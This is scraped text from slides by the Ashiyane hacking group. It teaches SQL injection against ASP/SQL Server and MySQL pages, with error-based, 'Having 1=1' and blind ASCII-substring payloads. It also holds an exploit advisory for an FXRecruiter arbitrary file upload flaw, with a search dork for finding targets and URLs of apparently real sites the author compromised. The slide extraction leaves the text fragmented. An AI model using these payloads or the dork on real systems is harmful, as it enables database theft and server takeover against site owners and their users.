Upload
others
View
2
Download
0
Embed Size (px)
Citation preview
www.ashiyane.org
Ashiyane Digital Security Team
Ashiyane Digital Security Team
Ashiyane Digital Security Team
Ashiyane Digital Security Team
Ashiyane Digital Security Team
Ashiyane Digital Security Team
www.site.com/news.asp?id=@@Version
www.site.com/news.asp?id=(Select Name
From SysObject Where Xtype=’U’)
Microsoft OLE DB Provider for ODBC Driverserror ‘80004005’
[Microsoft][ODBC SQL Server Driver][SQLServer]Subquery returned more than 1 value.This is not permitted when the subqueryfollows =, !=, <, <= , >, >= or when thesubquery is used as an expression
Select Top 1 Name From SysObjects Where
Xtype=’U’
Ashiyane Digital Security Team
news.asp?id=(Select Top 1 Name From
SysObject Where Xtype=’U’ And Name Not In
(‘User’))
www.site.com/news.asp?id=2 Having 1=1
Microsoft OLE DB Provider for ODBC Driverserror ‘80040e14’
[Microsoft][ODBC SQL Server Driver][SQLServer]Column ‘dbo. MeetingDetails.id ‘ isinvalid in the select list because it is notcontained in an aggregate function and thereis no GROUP BY clause.
www.site.com/news.asp?id=2 Group By id
Having 1=1www.site.com/news.asp?id=5 And
SubString(@@version,1,1)=5
www.site.com/news.asp?id=5 And 5=5
Ashiyane Digital Security Team
news.asp?id=5 And (Select SubString
(Concat(1,Column-name),1,1)FRom
Table_Name Limit 0,1)=1
<And ascii (SubString((Select
Concat(Column_Name) From Table_Name
Limit 0,1),1,1))><Char
And ascii (SubString((Select
Concat(User_Name) From Users Limit
0,1),1,1)) > 98
news.asp?id=5 And ( Select 1 From
Table_Name Limit 0,1)=1
Ashiyane Digital Security Team
Ashiyane Digital Security Team
Ashiyane Digital Security Team
Ashiyane Digital Security Team
Ashiyane Digital Security Team
Ashiyane Digital Security Team
Ashiyane Digital Security Team
http://cloud.github.com/downloads/easyphp/easyphp/EasyPHP-5.3.6.0-setup.exe
Ashiyane Digital Security Team
Ashiyane Digital Security Team
Ashiyane Digital Security Team
www.wampserver.com/en/
mysql , mssql , oracle , msql , postgresql
Ashiyane Digital Security Team
Ashiyane Digital Security Team
Ashiyane Digital Security Team
Ashiyane Digital Security Team
Ashiyane Digital Security Team
Ashiyane Digital Security Team
Ashiyane Digital Security Team
=======================================================================# FXRecruiter Arbitary File Upload Vulnerability=======================================================================# Name: FXRecruiter Arbitary File Upload Vulnerability
# Vendor: http://www.fxrecruiter.co.uk & http://www.reversedelta.com
# Risk: High
# Date: 2011-03-27
# Author: Ashiyane Digital Security Team
# Contact: XroGuE_p3rsi4n_hack3r[at]Hotmail[Dot]com
# Home: www.Ashiyane.org/forums/
# Gr33tz: Behrooz_Ice,Virangar,And All Ashiyane Members !
==========================================================================
[+] Dork: intext:”Powered by FXRecruiter” & inurl:”page.php?page=*.php”
==========================================================================[+] Note : You must Register at site, Then in “Upload CV Field” Select and
[-] Upload Your File, then Using “Live Http Header” Change ur File Format To Etc ...
[+] Uploaded path: http://127.0.0.1/fxmodules/resumes/[Your File].*
[+] Demo1: http://www.resourcing-solutions.com/fxmodules/resumes/haha_ehehe.html
[+] Demo2: http://www.energyintoenergy.com/fxmodules/resumes/p3rsi4n_hack3r_xrogue1.html
[+] Demo3: http://peoplemarketing.co.uk/fxmodules/resumes/black_xrogue.html
[+] Demo4: http://www.charles-hunter.com/fxmodules/resumes/black_hat_xrogue.html
[+] Demo5: http://www.activesolutionsrecruitment.com/fxmodules/resumes/black_hat_xrogue.html==========================================================================
# Why I Put 5 Demo Site ????
* For Some People That Think my Report’s Is Fake or not AVAILABLE At Net... !!! :-l
$ Need Live Video ??? : ~>
Video : http://www.vimeo.com/21464321
Video http://www.4shared.com/file/AIwSyKn-/FXRecruiter_Arbitary_File_Uplo.html
==========================================================================[+] Taghdim be Baxe Ashiyane, Happy New Year... omidVaram Sale KHoobi dashte bashin ![+] Discovered By XroGuE !!!
BUG
Ashiyane Digital Security Team
Zone-HZone-H
http://zone-h.org/stats/notifierspecial
Ashiyane Digital Security Team
Ashiyane Digital Security Team
Ashiyane Digital Security Team
Ashiyane Digital Security Team
Ashiyane Digital Security Team